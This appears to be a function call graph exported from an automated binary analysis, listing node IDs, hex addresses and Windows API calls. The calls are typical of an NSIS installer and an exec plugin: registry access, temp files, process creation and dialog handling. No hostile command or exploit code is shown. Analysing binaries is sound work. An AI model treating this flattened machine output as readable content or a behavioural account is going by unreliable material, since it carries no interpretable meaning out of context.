3414 4041ce GetSysColor 3412->3414 3415 4041e1 SetBkMode 3413->3415 3416 4041d7 SetTextColor 3413->3416 3414->3413 3417 4041f9 GetSysColor 3415->3417 3418 4041ff 3415->3418 3416->3415 3417->3418 3419 404210 3418->3419 3420 404206 SetBkColor 3418->3420 3419->3421 3422 404223 DeleteObject 3419->3422 3423 40422a CreateBrushIndirect 3419->3423 3420->3419 3421->3383 3422->3423 3423->3421 3431 40417b 3424->3431 3426 40528a 3430 4052b1 3426->3430 3434 401389 3426->3434 3427 40417b SendMessageW 3428 4052c3 OleUninitialize 3427->3428 3430->3427 3432 404193 3431->3432 3433 404184 SendMessageW 3431->3433 3432->3426 3433->3432 3436 401390 3434->3436 3435 4013fe 3435->3426 3436->3435 3437 4013cb MulDiv SendMessageW 3436->3437 3437->3436 4262 402253 4263 40225b 4262->4263 4266 402261 4262->4266 4264 402b3a 18 API calls 4263->4264 4264->4266 4265 40226f 4268 40227d 4265->4268 4269 402b3a 18 API calls 4265->4269 4266->4265 4267 402b3a 18 API calls 4266->4267 4267->4265 4270 402b3a 18 API calls 4268->4270 4269->4268 4271 402286 WritePrivateProfileStringW 4270->4271 3438 402454 3448 402c44 3438->3448 3440 40245e 3441 402b1d 18 API calls 3440->3441 3442 402467 3441->3442 3443 40248b RegEnumValueW 3442->3443 3444 40247f RegEnumKeyW 3442->3444 3446 402793 3442->3446 3445 4024a4 RegCloseKey 3443->3445 3443->3446 3444->3445 3445->3446 3449 402b3a 18 API calls 3448->3449 3450 402c5d 3449->3450 3451 402c6b RegOpenKeyExW 3450->3451 3451->3440 4272 401ed4 4273 402b3a 18 API calls 4272->4273 4274 401edb 4273->4274 4275 40622d 2 API calls 4274->4275 4276 401ee1 4275->4276 4278 401ef2 4276->4278 4279 405e31 wsprintfW 4276->4279 4279->4278 3574 4022d5 3575 402305 3574->3575 3576 4022da 3574->3576 3578 402b3a 18 API calls 3575->3578 3577 402c44 19 API calls 3576->3577 3579 4022e1 3577->3579 3580 40230c 3578->3580 3581 4022eb 3579->3581 3585 402322 3579->3585 3586 402b7a RegOpenKeyExW 3580->3586 3582 402b3a 18 API calls 3581->3582 3583 4022f2 RegDeleteValueW RegCloseKey 3582->3583 3583->3585 3587 402c0e 3586->3587 3594 402ba5 3586->3594 3587->3585 3588 402bcb RegEnumKeyW 3589 402bdd RegCloseKey 3588->3589 3588->3594 3591 406254 3 API calls 3589->3591 3590 402c02 RegCloseKey 3595 402bf1 3590->3595 3593 402bed 3591->3593 3592 402b7a 3 API calls 3592->3594 3593->3595 3596 402c1d RegDeleteKeyW 3593->3596 3594->3588 3594->3589 3594->3590 3594->3592 3595->3587 3596->3595 3597 403c57 3598 403daa 3597->3598 3599 403c6f 3597->3599 3601 403dbb GetDlgItem GetDlgItem 3598->3601 3616 403dfb 3598->3616 3599->3598 3600 403c7b 3599->3600 3602 403c86 SetWindowPos 3600->3602 3603 403c99 3600->3603 3604 40412f 19 API calls 3601->3604 3602->3603 3607 403cb6 3603->3607 3608 403c9e ShowWindow 3603->3608 3609 403de5 SetClassLongW 3604->3609 3605 403e55 3606 40417b SendMessageW 3605->3606 3611 403da5 3605->3611 3635 403e67 3606->3635 3612 403cd8 3607->3612 3613 403cbe DestroyWindow 3607->3613 3608->3607 3614 40140b 2 API calls 3609->3614 3610 401389 2 API calls 3619 403e2d 3610->3619 3617 403cdd SetWindowLongW 3612->3617 3618 403cee 3612->3618 3615 4040b8 3613->3615 3614->3616 3615->3611 3628 4040e9 ShowWindow 3615->3628 3616->3605 3616->3610 3617->3611 3620 403d97 3618->3620 3621 403cfa GetDlgItem 3618->3621 3619->3605 3622 403e31 SendMessageW 3619->3622 3627 404196 8 API calls 3620->3627 3625 403d2a 3621->3625 3626 403d0d SendMessageW IsWindowEnabled 3621->3626 3622->3611 3623 40140b 2 API calls 3623->3635 3624 4040ba DestroyWindow EndDialog 3624->3615 3630 403d37 3625->3630 3632 403d7e SendMessageW 3625->3632 3633 403d4a 3625->3633 3642 403d2f 3625->3642 3626->3611 3626->3625 3627->3611 3628->3611 3629 405f0c 18 API calls 3629->3635 3630->3632 3630->3642 3631 404108 SendMessageW 3634 403d65 3631->3634 3632->3620 3636 403d52 3633->3636 3637 403d67 3633->3637 3634->3620 3635->3611 3635->3623 3635->3624 3635->3629 3638 40412f 19 API calls 3635->3638 3643 40412f 19 API calls 3635->3643 3658 403ffa DestroyWindow 3635->3658 3670 40140b 3636->3670 3639 40140b 2 API calls 3637->3639 3638->3635 3641 403d6e 3639->3641 3641->3620 3641->3642 3642->3631 3644 403ee2 GetDlgItem 3643->3644 3645 403ef7 3644->3645 3646 403eff ShowWindow KiUserCallbackDispatcher 3644->3646 3645->3646 3667 404151 KiUserCallbackDispatcher 3646->3667 3648 403f29 EnableWindow 3651 403f3d 3648->3651 3649 403f42 GetSystemMenu EnableMenuItem SendMessageW 3650 403f72 SendMessageW 3649->3650 3649->3651 3650->3651 3651->3649 3668 404164 SendMessageW 3651->3668 3669 405eea lstrcpynW 3651->3669 3654 403fa0 lstrlenW 3655 405f0c 18 API calls 3654->3655 3656 403fb6 SetWindowTextW 3655->3656 3657 401389 2 API calls 3656->3657 3657->3635 3658->3615 3659 404014 CreateDialogParamW 3658->3659 3659->3615 3660 404047 3659->3660 3661 40412f 19 API calls 3660->3661 3662 404052 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3661->3662 3663 401389 2 API calls 3662->3663 3664 404098 3663->3664 3664->3611 3665 4040a0 ShowWindow 3664->3665 3666 40417b SendMessageW 3665->3666 3666->3615 3667->3648 3668->3651 3669->3654 3671 401389 2 API calls 3670->3671 3672 401420 3671->3672 3672->3642 4280 4014d7 4281 402b1d 18 API calls 4280->4281 4282 4014dd Sleep 4281->4282 4284 4029c7 4282->4284 3718 40335a #17 SetErrorMode OleInitialize 3719 406254 3 API calls 3718->3719 3720 40339d SHGetFileInfoW 3719->3720 3791 405eea lstrcpynW 3720->3791 3722 4033c8 GetCommandLineW 3792 405eea lstrcpynW 3722->3792 3724 4033da GetModuleHandleW 3725 4033f2 3724->3725 3726 405962 CharNextW 3725->3726 3727 403401 CharNextW 3726->3727 3731 403411 3727->3731 3728 4034e6 3729 4034fa GetTempPathW 3728->3729 3793 403326 3729->3793 3731->3728 3735 405962 CharNextW 3731->3735 3741 4034e8 3731->3741 3732 403512 3733 403516 GetWindowsDirectoryW lstrcatW 3732->3733 3734 40356c DeleteFileW 3732->3734 3736 403326 11 API calls 3733->3736 3801 402dbc GetTickCount GetModuleFileNameW 3734->3801 3735->3731 3738 403532 3736->3738 3738->3734 3740 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3738->3740 3739 403580 3742 403618 3739->3742 3746 403608 3739->3746 3747 405962 CharNextW 3739->3747 3745 403326 11 API calls 3740->3745 3885 405eea lstrcpynW 3741->3885 3888 4037c2 3742->3888 3750 403564 3745->3750 3831 4038b4 3746->3831 3751 40359b 3747->3751 3750->3734 3750->3742 3758 4035e2 3751->3758 3759 403647 lstrcatW lstrcmpiW 3751->3759 3752 403631 3755 4056c6 MessageBoxIndirectW 3752->3755 3753 403727 3754 4037aa ExitProcess 3753->3754 3756 406254 3 API calls 3753->3756 3760 40363f ExitProcess 3755->3760 3761 403736 3756->3761 3762 405a3d 18 API calls 3758->3762 3759->3742 3763 403663 CreateDirectoryW SetCurrentDirectoryW 3759->3763 3764 406254 3 API calls 3761->3764 3765 4035ee 3762->3765 3766 403686 3763->3766 3767 40367b 3763->3767 3768 40373f 3764->3768 3765->3742 3886 405eea lstrcpynW 3765->3886 3898 405eea lstrcpynW 3766->3898 3897 405eea lstrcpynW 3767->3897 3771 406254 3 API calls 3768->3771 3773 403748 3771->3773 3776 403796 ExitWindowsEx 3773->3776 3782 403756 GetCurrentProcess 3773->3782 3774 4035fd 3887 405eea lstrcpynW 3774->3887 3775 405f0c 18 API calls 3778 4036c5 DeleteFileW 3775->3778 3776->3754 3779 4037a3 3776->3779 3780 4036d2 CopyFileW 3778->3780 3788 403694 3778->3788 3781 40140b 2 API calls 3779->3781 3780->3788 3781->3754 3785 403766 3782->3785 3783 40371b 3786 405d84 40 API calls 3783->3786 3784 405d84 40 API calls 3784->3788 3785->3776 3786->3742 3787 405f0c 18 API calls 3787->3788 3788->3775 3788->3783 3788->3784 3788->3787 3790 403706 CloseHandle 3788->3790 3899 405665 CreateProcessW 3788->3899 3790->3788 3791->3722 3792->3724 3794 40617e 5 API calls 3793->3794 3795 403332 3794->3795 3796 40333c 3795->3796 3797 405935 3 API calls 3795->3797 3796->3732 3798 403344 CreateDirectoryW 3797->3798 3902 405b85 3798->3902 3906 405b56 GetFileAttributesW CreateFileW 3801->3906 3803 402dff 3830 402e0c 3803->3830 3907 405eea lstrcpynW 3803->3907 3805 402e22 3806 405981 2 API calls 3805->3806 3807 402e28 3806->3807 3908 405eea lstrcpynW 3807->3908 3809 402e33 GetFileSize 3810 402f34 3809->3810 3828 402e4a 3809->3828 3811 402d1a 33 API calls 3810->3811 3812 402f3b 3811->3812 3814 402f77 GlobalAlloc 3812->3814 3812->3830 3910 40330f SetFilePointer 3812->3910 3813 4032f9 ReadFile 3813->3828 3818 402f8e 3814->3818 3815 402fcf 3816 402d1a 33 API calls 3815->3816 3816->3830 3822 405b85 2 API calls 3818->3822 3819 402f58 3820 4032f9 ReadFile 3819->3820 3823 402f63 3820->3823 3821 402d1a 33 API calls 3821->3828 3824 402f9f CreateFileW 3822->3824 3823->3814 3823->3830 3825 402fd9 3824->3825 3824->3830 3909 40330f SetFilePointer 3825->3909 3827 402fe7 3829 403062 46 API calls 3827->3829 3828->3810 3828->3813 3828->3815 3828->3821 3828->3830 3829->3830 3830->3739 3832 406254 3 API calls 3831->3832 3833 4038c8 3832->3833 3834 4038e0 3833->3834 3835 4038ce 3833->3835 3836 405db7 3 API calls 3834->3836 3920 405e31 wsprintfW 3835->3920 3837 403910 3836->3837 3839 40392f lstrcatW 3837->3839 3841 405db7 3 API calls 3837->3841 3840 4038de 3839->3840 3911 403b8a 3840->3911 3841->3839 3844 405a3d 18 API calls 3845 403961 3844->3845 3846 4039f5 3845->3846 3848 405db7 3 API calls 3845->3848 3847 405a3d 18 API calls 3846->3847 3849 4039fb 3847->3849 3850 403993 3848->3850 3851 403a0b LoadImageW 3849->3851 3852 405f0c 18 API calls 3849->3852 3850->3846 3855 4039b4 lstrlenW 3850->3855 3858 405962 CharNextW 3850->3858 3853 403ab1 3851->3853 3854 403a32 RegisterClassW 3851->3854 3852->3851 3857 40140b 2 API calls 3853->3857 3856 403a68 SystemParametersInfoW CreateWindowExW 3854->3856 3883 403abb 3854->3883 3859 4039c2 lstrcmpiW 3855->3859 3860 4039e8 3855->3860 3856->3853 3864 403ab7 3857->3864 3862 4039b1 3858->3862 3859->3860 3863 4039d2 GetFileAttributesW 3859->3863 3861 405935 3 API calls 3860->3861 3866 4039ee 3861->3866 3862->3855 3867 4039de 3863->3867 3865 403b8a 19 API calls 3864->3865 3864->3883 3868 403ac8 3865->3868 3921 405eea lstrcpynW 3866->3921 3867->3860 3870 405981 2 API calls 3867->3870 3871 403ad4 ShowWindow LoadLibraryW 3868->3871 3872 403b57 3868->3872 3870->3860 3873 403af3 LoadLibraryW 3871->3873 3874 403afa GetClassInfoW 3871->3874 3875 405267 5 API calls 3872->3875 3873->3874 3876 403b24 DialogBoxParamW 3874->3876 3877 403b0e GetClassInfoW RegisterClassW 3874->3877 3878 403b5d 3875->3878 3879 40140b 2 API calls 3876->3879 3877->3876 3880 403b61 3878->3880 3881 403b79 3878->3881 3879->3883 3880->3883 3884 40140b 2 API calls 3880->3884 3882 40140b 2 API calls 3881->3882 3882->3883 3883->3742 3884->3883 3885->3729 3886->3774 3887->3746 3889 4037d3 CloseHandle 3888->3889 3890 4037dd 3888->3890 3889->3890 3891 4037f1 3890->3891 3892 4037e7 CloseHandle 3890->3892 3923 40381f 3891->3923 3892->3891 3895 405772 71 API calls 3896 403621 OleUninitialize 3895->3896 3896->3752 3896->3753 3897->3766 3898->3788 3900 4056a0 3899->3900 3901 405694 CloseHandle 3899->3901 3900->3788 3901->3900 3903 405b92 GetTickCount GetTempFileNameW 3902->3903 3904 403358 3903->3904 3905 405bc8 3903->3905 3904->3732 3905->3903 3905->3904 3906->3803 3907->3805 3908->3809 3909->3827 3910->3819 3912 403b9e 3911->3912 3922 405e31 wsprintfW 3912->3922 3914 403c0f 3915 405f0c 18 API calls 3914->3915 3916 403c1b SetWindowTextW 3915->3916 3917 40393f 3916->3917 3918 403c37 3916->3918 3917->3844 3918->3917 3919 405f0c 18 API calls 3918->3919 3919->3918 3920->3840 3921->3846 3922->3914 3924 40382d 3923->3924 3925 403832 FreeLibrary GlobalFree 3924->3925 3926 4037f6 3924->3926 3925->3925 3925->3926 3926->3895 4285 40155b 4286 40296d 4285->4286 4289 405e31 wsprintfW 4286->4289 4288 402972 4289->4288 4297 4023e0 4298 402c44 19 API calls 4297->4298 4299 4023ea 4298->4299 4300 402b3a 18 API calls 4299->4300 4301 4023f3 4300->4301 4302 4023fe RegQueryValueExW 4301->4302 4306 402793 4301->4306 4303 402424 RegCloseKey 4302->4303 4304 40241e 4302->4304 4303->4306 4304->4303 4308 405e31 wsprintfW 4304->4308 4308->4303 4309 401ce5 GetDlgItem GetClientRect 4310 402b3a 18 API calls 4309->4310 4311 401d17 LoadImageW SendMessageW 4310->4311 4312 401d35 DeleteObject 4311->4312 4313 4029c7 4311->4313 4312->4313 4314 40206a 4315 402b3a 18 API calls 4314->4315 4316 402071 4315->4316 4317 402b3a 18 API calls 4316->4317 4318 40207b 4317->4318 4319 402b3a 18 API calls 4318->4319 4320 402084 4319->4320 4321 402b3a 18 API calls 4320->4321 4322 40208e 4321->4322 4323 402b3a 18 API calls 4322->4323 4324 402098 4323->4324 4325 4020ac CoCreateInstance 4324->4325 4326 402b3a 18 API calls 4324->4326 4329 4020cb 4325->4329 4326->4325 4327 401423 25 API calls 4328 402197 4327->4328 4329->4327 4329->4328 4330 40156b 4331 401584 4330->4331 4332 40157b ShowWindow 4330->4332 4333 401592 ShowWindow 4331->4333 4334 4029c7 4331->4334 4332->4331 4333->4334 4338 4024ee 4339 4024f3 4338->4339 4340 40250c 4338->4340 4343 402b1d 18 API calls 4339->4343 4341 402512 4340->4341 4342 40253e 4340->4342 4344 402b3a 18 API calls 4341->4344 4345 402b3a 18 API calls 4342->4345 4348 4024fa 4343->4348 4346 402519 WideCharToMultiByte lstrlenA 4344->4346 4347 402545 lstrlenW 4345->4347 4346->4348 4347->4348 4349 402567 WriteFile 4348->4349 4350 402793 4348->4350 4349->4350 4351 4018ef 4352 401926 4351->4352 4353 402b3a 18 API calls 4352->4353 4354 40192b 4353->4354 4355 405772 71 API calls 4354->4355 4356 401934 4355->4356 4357 402770 4358 402b3a 18 API calls 4357->4358 4359 402777 FindFirstFileW 4358->4359 4360 40279f 4359->4360 4364 40278a 4359->4364 4361 4027a8 4360->4361 4365 405e31 wsprintfW 4360->4365 4366 405eea lstrcpynW 4361->4366 4365->4361 4366->4364 4367 4014f1 SetForegroundWindow 4368 4029c7 4367->4368 4369 403872 4370 40387d 4369->4370 4371 403881 4370->4371 4372 403884 GlobalAlloc 4370->4372 4372->4371 4373 4018f2 4374 402b3a 18 API calls 4373->4374 4375 4018f9 4374->4375 4376 4056c6 MessageBoxIndirectW 4375->4376 4377 401902 4376->4377 4378 402573 4379 402b1d 18 API calls 4378->4379 4385 402582 4379->4385 4380 4026a0 4381 4025c8 ReadFile 4381->4380 4381->4385 4382 405bd9 ReadFile 4382->4385 4383 4026a2 4390 405e31 wsprintfW 4383->4390 4384 402608 MultiByteToWideChar 4384->4385 4385->4380 4385->4381 4385->4382 4385->4383 4385->4384 4387 4026b3 4385->4387 4388 40262e SetFilePointer MultiByteToWideChar 4385->4388 4387->4380 4389 4026d4 SetFilePointer 4387->4389 4388->4385 4389->4380 4390->4380 4391 401df3 4392 402b3a 18 API calls 4391->4392 4393 401df9 4392->4393 4394 402b3a 18 API calls 4393->4394 4395 401e02 4394->4395 4396 402b3a 18 API calls 4395->4396 4397 401e0b 4396->4397 4398 402b3a 18 API calls 4397->4398 4399 401e14 4398->4399 4400 401423 25 API calls 4399->4400 4401 401e1b ShellExecuteW 4400->4401 4402 401e4c 4401->4402 4422 4026f9 4423 402700 4422->4423 4429 402972 4422->4429 4424 402b1d 18 API calls 4423->4424 4425 40270b 4424->4425 4426 402712 SetFilePointer 4425->4426 4427 402722 4426->4427 4426->4429 4430 405e31 wsprintfW 4427->4430 4430->4429 4438 40427d lstrlenW 4439 40429c 4438->4439 4440 40429e WideCharToMultiByte 4438->4440 4439->4440 4441 402c7f 4442 402c91 SetTimer 4441->4442 4443 402caa 4441->4443 4442->4443 4444 402cf8 4443->4444 4445 402cfe MulDiv 4443->4445 4446 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 4445->4446 4446->4444 4448 4014ff 4449 401507 4448->4449 4451 40151a 4448->4451 4450 402b1d 18 API calls 4449->4450 4450->4451 4452 401000 4453 401037 BeginPaint GetClientRect 4452->4453 4454 40100c DefWindowProcW 4452->4454 4456 4010f3 4453->4456 4457 401179 4454->4457 4458 401073 CreateBrushIndirect FillRect DeleteObject 4456->4458 4459 4010fc 4456->4459 4458->4456 4460 401102 CreateFontIndirectW 4459->4460 4461 401167 EndPaint 4459->4461 4460->4461 4462 401112 6 API calls 4460->4462 4461->4457 4462->4461 4463 401a00 4464 402b3a 18 API calls 4463->4464 4465 401a09 ExpandEnvironmentStringsW 4464->4465 4466 401a1d 4465->4466 4468 401a30 4465->4468 4467 401a22 lstrcmpW 4466->4467 4466->4468 4467->4468 4469 401b01 4470 402b3a 18 API calls 4469->4470 4471 401b08 4470->4471 4472 402b1d 18 API calls 4471->4472 4473 401b11 wsprintfW 4472->4473 4474 4029c7 4473->4474 4475 404583 4476 404593 4475->4476 4477 4045b9 4475->4477 4478 40412f 19 API calls 4476->4478 4479 404196 8 API calls 4477->4479 4480 4045a0 SetDlgItemTextW 4478->4480 4481 4045c5 4479->4481 4480->4477 4482 405108 4483 405118 4482->4483 4484 40512c 4482->4484 4486 40511e 4483->4486 4494 405175 4483->4494 4485 405134 IsWindowVisible 4484->4485 4492 40514b 4484->4492 4487 405141 4485->4487 4485->4494 4489 40417b SendMessageW 4486->4489 4495 404a5e SendMessageW 4487->4495 4488 40517a CallWindowProcW 4491 405128 4488->4491 4489->4491 4492->4488 4500 404ade 4492->4500 4494->4488 4496 404a81 GetMessagePos ScreenToClient SendMessageW 4495->4496 4497 404abd SendMessageW 4495->4497 4498 404ab5 4496->4498 4499 404aba 4496->4499 4497->4498 4498->4492 4499->4497 4509 405eea lstrcpynW 4500->4509 4502 404af1 4510 405e31 wsprintfW 4502->4510 4504 404afb 4505 40140b 2 API calls 4504->4505 4506 404b04 4505->4506 4511 405eea lstrcpynW 4506->4511 4508 404b0b 4508->4494 4509->4502 4510->4504 4511->4508 4512 401f08 4513 402b3a 18 API calls 4512->4513 4514 401f0f GetFileVersionInfoSizeW 4513->4514 4515 401f36 GlobalAlloc 4514->4515 4517 401f8c 4514->4517 4516 401f4a GetFileVersionInfoW 4515->4516 4515->4517 4516->4517 4518 401f59 VerQueryValueW 4516->4518 4518->4517 4519 401f72 4518->4519 4523 405e31 wsprintfW 4519->4523 4521 401f7e 4524 405e31 wsprintfW 4521->4524 4523->4521 4524->4517 4532 404b10 GetDlgItem GetDlgItem 4533 404b62 7 API calls 4532->4533 4542 404d7b 4532->4542 4534 404c05 DeleteObject 4533->4534 4535 404bf8 SendMessageW 4533->4535 4536 404c0e 4534->4536 4535->4534 4537 404c45 4536->4537 4541 405f0c 18 API calls 4536->4541 4539 40412f 19 API calls 4537->4539 4538 404e5f 4540 404f0b 4538->4540 4544 404d6e 4538->4544 4550 404eb8 SendMessageW 4538->4550 4543 404c59 4539->4543 4545 404f15 SendMessageW 4540->4545 4546 404f1d 4540->4546 4547 404c27 SendMessageW SendMessageW 4541->4547 4542->4538 4548 404a5e 5 API calls 4542->4548 4561 404dec 4542->4561 4549 40412f 19 API calls 4543->4549 4551 404196 8 API calls 4544->4551 4545->4546 4553 404f36 4546->4553 4554 404f2f ImageList_Destroy 4546->4554 4562 404f46 4546->4562 4547->4536 4548->4561 4567 404c67 4549->4567 4550->4544 4556 404ecd SendMessageW 4550->4556 4557 405101 4551->4557 4552 404e51 SendMessageW 4552->4538 4558 404f3f GlobalFree 4553->4558 4553->4562 4554->4553 4555 4050b5 4555->4544 4563 4050c7 ShowWindow GetDlgItem ShowWindow 4555->4563 4560 404ee0 4556->4560 4558->4562 4559 404d3c GetWindowLongW SetWindowLongW 4564 404d55 4559->4564 4571 404ef1 SendMessageW 4560->4571 4561->4538 4561->4552 4562->4555 4575 404ade 4 API calls 4562->4575 4578 404f81 4562->4578 4563->4544 4565 404d73 4564->4565 4566 404d5b ShowWindow 4564->4566 4584 404164 SendMessageW 4565->4584 4583 404164 SendMessageW 4566->4583 4567->4559 4570 404cb7 SendMessageW 4567->4570 4572 404d36 4567->4572 4573 404cf3 SendMessageW 4567->4573 4574 404d04 SendMessageW 4567->4574 4570->4567 4571->4540 4572->4559 4572->4564 4573->4567 4574->4567 4575->4578 4576 40508b InvalidateRect 4576->4555 4577 4050a1 4576->4577 4580 404978 21 API calls 4577->4580 4579 404faf SendMessageW 4578->4579 4582 404fc5 4578->4582 4579->4582 4580->4555 4581 405039 SendMessageW SendMessageW 4581->4582 4582->4576 4582->4581 4583->4544 4584->4542 4585 401491 4586 405194 25 API calls 4585->4586 4587 401498 4586->4587 4588 404912 4589 404922 4588->4589 4590 40493e 4588->4590 4599 4056aa GetDlgItemTextW 4589->4599 4592 404971 4590->4592 4593 404944 SHGetPathFromIDListW 4590->4593 4595 40495b SendMessageW 4593->4595 4596 404954 4593->4596 4594 40492f SendMessageW 4594->4590 4595->4592 4597 40140b 2 API calls 4596->4597 4597->4595 4599->4594 4600 402295 4601 402b3a 18 API calls 4600->4601 4602 4022a4 4601->4602 4603 402b3a 18 API calls 4602->4603 4604 4022ad 4603->4604 4605 402b3a 18 API calls 4604->4605 4606 4022b7 GetPrivateProfileStringW 4605->4606 3673 401f98 3674 401faa 3673->3674 3683 40205c 3673->3683 3675 402b3a 18 API calls 3674->3675 3676 401fb1 3675->3676 3678 402b3a 18 API calls 3676->3678 3677 401423 25 API calls 3684 402197 3677->3684 3679 401fba 3678->3679 3680 401fd0 LoadLibraryExW 3679->3680 3681 401fc2 GetModuleHandleW 3679->3681 3682 401fe1 3680->3682 3680->3683 3681->3680 3681->3682 3693 4062c0 WideCharToMultiByte 3682->3693 3683->3677 3687 401ff2 3691 402002 3687->3691 3696 401423 3687->3696 3688 40202b 3689 405194 25 API calls 3688->3689 3689->3691 3691->3684 3692 40204e FreeLibrary 3691->3692 3692->3684 3694 4062ea GetProcAddress 3693->3694 3695 401fec 3693->3695 3694->3695 3695->3687 3695->3688 3697 405194 25 API calls 3696->3697 3698 401431 3697->3698 3698->3691 4607 401718 4608 402b3a 18 API calls 4607->4608 4609 40171f SearchPathW 4608->4609 4610 40173a 4609->4610 3927 1000105a 3930 10001112 3927->3930 4009 10001096 GetModuleHandleW GetProcAddress 3930->4009 3933 10001147 GetModuleFileNameW GlobalAlloc 3935 1000118e 3933->3935 3934 1000128c GlobalAlloc 3936 100012aa 3934->3936 3937 10001194 CharPrevW 3935->3937 3938 100011ae 3935->3938 3939 100012c2 FindWindowExW FindWindowExW 3936->3939 3950 100012e3 3936->3950 3937->3935 3937->3938 3941 100011b8 3938->3941 3942 100011ce GetTempFileNameW CopyFileW 3938->3942 3939->3950 4022 10001a8c 3941->4022 3944 10001203 CreateFileW CreateFileMappingW MapViewOfFile 3942->3944 3945 1000126d lstrcatW lstrlenW 3942->3945 3948 10001239 UnmapViewOfFile 3944->3948 3949 1000125f CloseHandle CloseHandle 3944->3949 3945->3936 3947 100011c2 GlobalFree 3951 10001085 3947->3951 3948->3949 3949->3945 3952 10001309 lstrcmpiW 3950->3952 4012 10001a4c 3950->4012 4017 10001862 lstrlenW lstrlenW 3950->4017 3952->3950 3953 10001325 3952->3953 3954 10001356 3953->3954 3955 1000132a 3953->3955 3956 10001401 GetVersionExW 3954->3956 3958 100013d5 GlobalAlloc 3954->3958 3957 10001a8c 2 API calls 3955->3957 3959 10001437 3956->3959 3960 10001417 InitializeSecurityDescriptor SetSecurityDescriptorDacl 3956->3960 3961 10001334 3957->3961 3965 10001711 lstrcpyW 3958->3965 3966 100013f7 GlobalLock 3958->3966 3963 1000143a CreatePipe 3959->3963 3960->3963 3961->3947 3964 10001348 DeleteFileW 3961->3964 3963->3965 3967 10001458 CreatePipe 3963->3967 3964->3947 3968 10001723 3965->3968 3966->3956 3967->3965 3969 10001473 GetStartupInfoW CreateProcessW 3967->3969 3970 10001731 3968->3970 3971 10001729 3968->3971 3969->3965 3972 100014bf GetTickCount 3969->3972 3975 1000174a 3970->3975 3976 1000173f 3970->3976 3973 10001a8c 2 API calls 3971->3973 3974 100014c8 3972->3974 3973->3970 3974->3968 3979 100014db PeekNamedPipe 3974->3979 3986 100016d9 Sleep 3974->3986 3987 100016ab GetTickCount 3974->3987 3977 10001753 lstrcpyW 3975->3977 3978 10001765 3975->3978 3980 100017f6 3 API calls 3976->3980 3977->3978 3982 10001786 3978->3982 3983 1000176e wsprintfW 3978->3983 3979->3974 3981 100014f5 GetTickCount ReadFile 3979->3981 3984 10001748 3980->3984 4025 100010d3 lstrlenA 3981->4025 3988 10001a8c 2 API calls 3982->3988 3983->3982 3984->3975 3990 100016e1 WaitForSingleObject GetExitCodeProcess PeekNamedPipe 3986->3990 3987->3986 3989 100016ba TerminateProcess lstrcpyW 3987->3989 3991 10001792 6 API calls 3988->3991 3989->3990 3990->3974 3993 100017c1 3991->3993 3992 10001539 lstrlenW 3994 10001569 lstrlenW GlobalSize 3992->3994 3995 1000154a lstrlenW lstrcpynW 3992->3995 3996 100017d3 GlobalFree 3993->3996 3997 100017ca DeleteFileW 3993->3997 3998 10001586 GlobalUnlock GlobalReAlloc 3994->3998 3999 100015b7 lstrcatW 3994->3999 3995->3990 3996->3951 4000 100017e3 GlobalUnlock GlobalFree 3996->4000 3997->3996 3998->3965 4001 100015ad GlobalLock 3998->4001 4007 1000152d 3999->4007 4000->3951 4001->3999 4002 10001862 5 API calls 4002->4007 4003 100015cb GlobalSize 4004 100015ed lstrlenW 4003->4004 4003->4007 4005 1000160c lstrcpyW 4004->4005 4004->4007 4005->4007 4006 10001678 CharNextW 4006->4007 4007->3990 4007->3992 4007->4002 4007->4003 4007->4005 4007->4006 4029 100017f6 4007->4029 4010 100010b8 GetCurrentProcess 4009->4010 4011 100010c5 4009->4011 4010->4011 4011->3933 4011->3934 4013 10001a85 4012->4013 4014 10001a56 4012->4014 4013->3950 4014->4013 4015 10001a63 lstrcpyW 4014->4015 4016 10001a76 GlobalFree 4014->4016 4015->4016 4016->4013 4018 10001883 lstrcmpiW 4017->4018 4019 100018bd 4017->4019 4018->4019 4021 100018ac CharNextW lstrlenW 4018->4021 4019->3950 4021->4018 4021->4019 4023 10001a95 GlobalAlloc lstrcpynW 4022->4023 4024 10001acf 4022->4024 4023->4024 4024->3947 4026 10001102 lstrcpyW 4025->4026 4027 100010ee MultiByteToWideChar 4025->4027 4028 1000110c 4026->4028 4027->4028 4028->4007 4030 10001816 SendMessageW SendMessageW SendMessageW 4029->4030 4031 1000185e 4029->4031 4030->4031 4031->4007 4611 40159b 4612 402b3a 18 API calls 4611->4612 4613 4015a2 SetFileAttributesW 4612->4613 4614 4015b4 4613->4614 4615 40149e 4616 4014ac PostQuitMessage 4615->4616 4617 40223e 4615->4617 4616->4617 4618 4021a0 4619 402b3a 18 API calls 4618->4619 4620 4021a6 4619->4620 4621 402b3a 18 API calls 4620->4621 4622 4021af 4621->4622 4623 402b3a 18 API calls 4622->4623 4624 4021b8 4623->4624 4625 40622d 2 API calls 4624->4625 4626 4021c1 4625->4626 4627 4021d2 lstrlenW lstrlenW 4626->4627 4631 4021c5 4626->4631 4629 405194 25 API calls 4627->4629 4628 405194 25 API calls 4632 4021cd 4628->4632 4630 402210 SHFileOperationW 4629->4630 4630->4631 4630->4632 4631->4628 4631->4632 4633 401b22 4634 401b73 4633->4634 4635 401b2f 4633->4635 4636 401b78 4634->4636 4637 401b9d GlobalAlloc 4634->4637 4638 40222b 4635->4638 4643 401b46 4635->4643 4644 401bb8 4636->4644 4654 405eea lstrcpynW 4636->4654 4639 405f0c 18 API calls 4637->4639 4640 405f0c 18 API calls 4638->4640 4639->4644 4642 402238 4640->4642 4647 4056c6 MessageBoxIndirectW 4642->4647 4652 405eea lstrcpynW 4643->4652 4645 401b8a GlobalFree 4645->4644 4647->4644 4648 401b55 4653 405eea lstrcpynW 4648->4653 4650 401b64 4655 405eea lstrcpynW 4650->4655 4652->4648 4653->4650 4654->4645 4655->4644 4656 4029a2 SendMessageW 4657 4029c7 4656->4657 4658 4029bc InvalidateRect 4656->4658 4658->4657 3452 401924 3453 401926 3452->3453 3454 402b3a 18 API calls 3453->3454 3455 40192b 3454->3455 3458 405772 3455->3458 3498 405a3d 3458->3498 3461 4057b1 3467 4058dc 3461->3467 3512 405eea lstrcpynW 3461->3512 3462 40579a DeleteFileW 3468 401934 3462->3468 3464 4057d7 3465 4057ea 3464->3465 3466 4057dd lstrcatW 3464->3466 3513 405981 lstrlenW 3465->3513 3470 4057f0 3466->3470 3467->3468 3469 40622d 2 API calls 3467->3469 3472 4058f6 3469->3472 3473 405800 lstrcatW 3470->3473 3474 4057f6 3470->3474 3472->3468 3476 4058fa 3472->3476 3475 40580b lstrlenW 